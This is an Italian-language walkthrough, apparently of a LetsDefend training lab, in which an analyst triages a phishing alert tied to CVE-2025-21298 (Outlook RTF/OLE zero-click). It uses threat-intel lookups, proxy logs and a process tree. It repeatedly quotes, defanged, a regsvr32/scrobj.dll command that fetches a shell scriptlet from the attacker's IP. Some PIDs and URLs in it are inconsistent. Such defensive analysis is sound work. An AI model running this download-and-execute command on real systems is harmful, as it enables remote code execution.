
SOC336 - Rilevato sfruttamento RCE zero-click di Windows OLE (CVE-2025-21298) Walkthrough
(Torna su)
Uno dei nostri dipendenti, Austin, ha ricevuto un'email di phishing da un mittente sospetto e un avviso è stato attivato dopo che ha aperto l'email utilizzando Outlook il 04 febbraio 2025 alle 16:18. Il motivo dell'attivazione è stato "Allegato RTF dannoso identificato con pattern di exploit noto per CVE-2025-21298" .
(Torna su)
ID evento : 314
Ora evento : 04 feb 2025, 16:18 (penso fosse sbagliato)
Regola : SOC336 - Rilevata sfruttamento RCE Zero-Click OLE di Windows (CVE-2025-21298)
Livello : Analista della sicurezza
Indirizzo SMTP : 84.38.130.118
Indirizzo mittente : [email protected]
Indirizzo destinatario : [email protected]
Oggetto email : Important: Action Required for Upcoming Project Deadline
Allegato : mail.rtf
Hash allegato : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
Azione dispositivo : Consentita
Motivo dell'attivazione : Allegato RTF dannoso identificato con pattern di exploit noto per CVE-2025-21298.
(Torna su)
Analizziamo i log di Sicurezza Email, Gestione Log e Sicurezza degli Endpoint per il triage dell'avviso.
Ho cercato l'indirizzo del mittente projectmanagement@pm[.]me e ho fatto clic sull'email "Important: Action Required for Upcoming Project Deadline" inviata alle 05:12 dello stesso giorno, cosa che mi è sembrata strana perché i toni urgenti e parole come "Important" e "Action Required" mi hanno fatto pensare a un'email di phishing.
Ho cercato il dominio pm[.]me su VirusTotal e solo 1 vendor lo ha classificato come sospetto.
Tuttavia, quando ho cercato l'indirizzo SMTP 84[.]38[.]130[.]118, 7 vendor lo hanno segnalato come dannoso e malware, ed era correlato al server C2 SILVER.
84[.]38[.]130[.]118 è stato trovato anche nel database AbuseIPDB. Si trova a Riga, Riga, Lettonia, appartiene al dominio rixhost.lv ed è classificato come attacco DDoS, hacking e host compromesso.
Infine ho cercato l'hash df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 dell'allegato mail.rtf su VirusTotal e 29 vendor su 61 hanno segnalato l'allegato come dannoso. Appartiene alla famiglia di malware rtfmalformb ed è associato alla vulnerabilità CVE-2025-21298.
È stato confermato che un'email di phishing con un allegato dannoso è stata inviata ad Austin.
(Torna su)
Verifichiamo se ci sono state attività sospette dopo le 05:12, quando Austin ha aperto l'email di phishing.
Ho prima controllato il log del proxy e ho cercato l'indirizzo IP dannoso del mittente 84[.]38[.]130[.]118, scoprendo che alle 08:06 c'era una richiesta HTTP GET all'indirizzo IP dannoso con un URL hxxp://84[.]38[.]130[.]118/shell[.]sct avviata da cmd.exe, che scaricava un file scriptlet di Windows. Il codice di risposta era 200 OK, a indicare che il traffico in uscita era consentito e non bloccato dal firewall. Era insolito ricevere un file script che probabilmente conteneva una reverse shell.
(Torna su)
Poiché il traffico in uscita verso l'indirizzo IP dannoso è stato avviato da cmd.exe, ho prima controllato la cronologia del terminale e ho scoperto che alle 08:06:08 era stato eseguito un comando "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" per generare regsvr32.exe e recuperare il file script dall'indirizzo IP dannoso tramite scrobj.dll.
L'uso delle utilità integrate di Windows per recuperare lo script può lasciare tracce minime sul sistema, rendendo più difficile il processo di reverse engineering e analisi del malware!
(Torna su)
È stato confermato che c'era una connessione all'IP dannoso 84[.]38[.]130[.]118 alle 08:06:42, dopo l'evento di esecuzione del comando.
(Torna su)
Allora perché cmd.exe è stato eseguito semplicemente facendo clic su un'email? Pur non avendo trovato prove del download dell'allegato dannoso mail.rtf da parte di Austin, ho controllato i log degli endpoint e cercato eventuali eventi intorno alle 08:06.
ID processo: 7023
Ora evento: 04 feb 2025 08:06:25
Riga di comando: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
Processo padre: cmd.exe
OK, allora vediamo il processo padre cmd.exe
ID processo: 6784
Ora evento: 04 feb 2025 08:06:08
Riga di comando: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
Processo padre: outlook.exe
E infine ho controllato il processo padre di outlook.exe
ID processo: 4820
Ora evento: 04 feb 2025 08:05:15
Riga di comando: "C:\Windows\System32\cmd.exe"
Processo padre: explorer.exe
Quindi possiamo concludere i processi dannosi in un albero:
explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! Esecuzione dello script !
Tuttavia mi chiedevo ancora come i processi dannosi fossero stati avviati senza scaricare e aprire l'allegato dannoso, e come outlook.exe avesse generato il processo dannoso, finché non ho trovato informazioni su CVE-2025-21298.
(Torna su)
Secondo l'articolo di Offsec, a gennaio 2025 è stata scoperta una vulnerabilità critica zero-click OLE di Windows che consente l'esecuzione di codice in remoto (RCE) tramite email, con un punteggio CVSS di 9.8. Quando il destinatario designato apre o visualizza in anteprima l'email dannosa in Microsoft Outlook contenente un documento RTF dannoso con uno script incorporato , la vulnerabilità viene attivata, consentendo all'attaccante di eseguire codice arbitrario sul sistema interessato.
Ho fatto alcune ricerche su Windows OLE e sui processi di hijacking del documento RTF su Google e Gemini, collegandole alle mie conoscenze di reverse engineering:
(Torna su)
Non in quarantena
Dannoso
Accesso
(Torna su)
Classificazione: Critica
Tipo: Malware
Orario dell'attività:
04 feb 2025, 05:12 (email di phishing ricevuta)
04 feb 2025, 08:05:15 - 04 feb 2025, 08:06:42 (email di phishing aperta e codice dannoso eseguito)
Entità coinvolte:
Indirizzo mittente: projectmanagement@pm[.]me
Indirizzo SMTP: 84[.]38[.]130[.]118
Indirizzo email destinatario: Austin@letsdefend[.]io
Indirizzo IP destinatario: 172[.]16[.]17[.]137
Hostname: Austin
Motivi del vero positivo:
Alle 04 feb 2025, 05:12, un'email sospetta con oggetto "Important: Action Required for Upcoming Project Deadline" è stata inviata da [email protected] (indirizzo IP: 84.38.130.118) a [email protected] (indirizzo IP: 172.16.17.137) con un allegato mail.rtf (hash SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). I toni urgenti e le parole utilizzate nell'oggetto hanno lasciato intendere che si trattasse di un'email di phishing. Le fonti Threat Intel VirusTotal e AbuseIPDB hanno segnalato l'indirizzo IP del mittente, situato a Riga, Riga, Lettonia e appartenente al dominio rixhost.lv, e l'allegato come dannosi e malware.
Secondo i log del proxy, alle 08:06 c'era una richiesta HTTP GET all'indirizzo IP dannoso con un URL hxxp://84[.]38[.]130[.]118/shell[.]sct avviata da cmd.exe, che scaricava un file scriptlet di Windows. Il codice di risposta era 200 OK, a indicare che il traffico in uscita verso l'indirizzo IP dannoso era consentito e non bloccato dal firewall.
Secondo i log di Endpoint Security, il codice dannoso "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) è stato avviato da cmd.exe (PID: 6784), generato da outlook.exe (PID: 4820).
Lo sfruttamento è stato causato da una vulnerabilità critica zero-click OLE di Windows (CVE-2025-21298) che consente l'esecuzione di codice in remoto (RCE) tramite email, con un punteggio CVSS di 9.8 a gennaio 2025. Quando il destinatario designato apre o visualizza in anteprima l'email dannosa in Microsoft Outlook contenente un documento RTF dannoso con uno script incorporato, la vulnerabilità viene attivata, consentendo all'attaccante di eseguire codice arbitrario sul sistema interessato, stabilendo potenzialmente una reverse shell verso il server C2.
Motivi dell'escalation:
Sebbene il traffico di rete C2 attivo post-sfruttamento non sia stato ancora osservato in modo definitivo, i log di endpoint security hanno confermato l'esecuzione di regsvr32.exe tramite scrobj.dll per recuperare il file scriptlet shell.sct. A causa del punteggio CVSS di 9.8 della CVE-2025-21298, è necessaria un'ulteriore indagine per verificare se sull'host sono presenti attività sospette come persistenza o esfiltrazione di dati.
Rimedi:
Indicatori di compromissione:
(Torna su)
CVE-2025-21298: Una vulnerabilità critica OLE di Windows zero-click
(Torna su)